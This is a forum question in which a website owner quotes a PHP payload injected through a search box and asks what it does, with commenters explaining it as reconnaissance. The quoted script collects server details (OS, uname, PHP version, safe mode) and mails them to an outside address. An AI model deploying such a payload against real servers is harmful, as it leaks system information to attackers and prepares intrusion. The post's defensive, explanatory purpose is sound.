# Attacked by a hacker php

Tags: php, input, code-injection

I have a website using LAMP server. Recently somebody put a link into my search box. I'll copy the code here:

```
<?php
  $OS = @PHP_OS;
  $UNAME = @php_uname();
  $PHPv = @phpversion();
  $SafeMode = @ini_get('safe_mode');

  $hosts = $_SERVER["HTTP_HOST"];

  if ($SafeMode == '') { $SafeMode = "<i>OFF</i><BR>"; }
  else { $SafeMode = "<i>$SafeMode</i><BR>"; }


  $injek=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);

  $psn=("OS = " . $OS . "<BR>UNAME = " . $UNAME . "<BR>PHPVersion = " . $PHPv . "<BR>Safe Mode = " . $SafeMode . "<BR><font color=blue>http://" . $injek . "</font><BR>Ingat jangan pakai Injek Ini.<BR>");

  $header = $_SERVER["HTTP_HOST"];
  $header .= "MIME-Version: 1.0\r\n";
  If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
  If ($file_name) $header .= "--$uid\r\n";
  $header .= "Content-Type: text/$contenttype\r\n";
  $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
  $header .= "$message\r\n";
  If ($file_name) $header .= "--$uid\r\n";
  If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
  If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
  If ($file_name) $header .= "Content-Disposition: attachment; 

filename=\"$file_name\"\r\n\r\n";
  If ($file_name) $header .= "$content\r\n";
  If ($file_name) $header .= "--$uid--";
  $to = ("toyota.corola2016@gmail.com");
  $subject = ("$UNAME");
  mail($to,$subject,$psn,$header);

@include "$bn";

?>
  </table>
  </fieldset></form>
</div>
</body>

</html>
```

Nothing harmful was happened to my system due to security system for user inputs. But I want to know the purpose of the hacker. I am using PHP for about 2 years. However, I did not understand the purpose of this script. Can somebody help?

Comment: Looks like just data collection. The person who gets that email will likely try more targeted attacks later on

Comment: Maybe post it here http://security.stackexchange.com/questions

Comment: "Nothing harmful happened" - except someone was able to run arbitrary code on your system. That's harmful in itself - you cannot trust your own server. Find out where the hole is, possibly from your access logs.

Comment: @halfer Who said the code was ever run? As far as I understand it, input sanitising did its job here.

Comment: The precise meaning of "somebody put a link into my search box" is not clear.

Comment: Looks like the intruder might have been probing several servers and this script merely notifies him of a successful penetration, so he can later check out what to do with the victim.

Comment: @Siguza: you may be right, see AD7six's comment.